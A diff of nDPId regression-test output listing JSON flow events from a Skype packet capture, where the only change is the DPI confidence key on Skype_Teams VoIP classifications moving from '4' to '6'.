-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.172","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.166","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.97.100.249","src_port":13021,"dst_port":26635,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.176","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.141","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685484,"flow_last_seen":1431969685484,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.31","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.153","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.29","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.32","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.172","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.166","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.97.100.249","src_port":13021,"dst_port":26635,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.176","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.141","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685484,"flow_last_seen":1431969685484,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.31","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.153","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.29","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969750597,"flow_last_seen":1431969791165,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":916,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.47","src_port":50134,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969750597,"flow_last_seen":1431969791165,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":916,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.47","src_port":50134,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 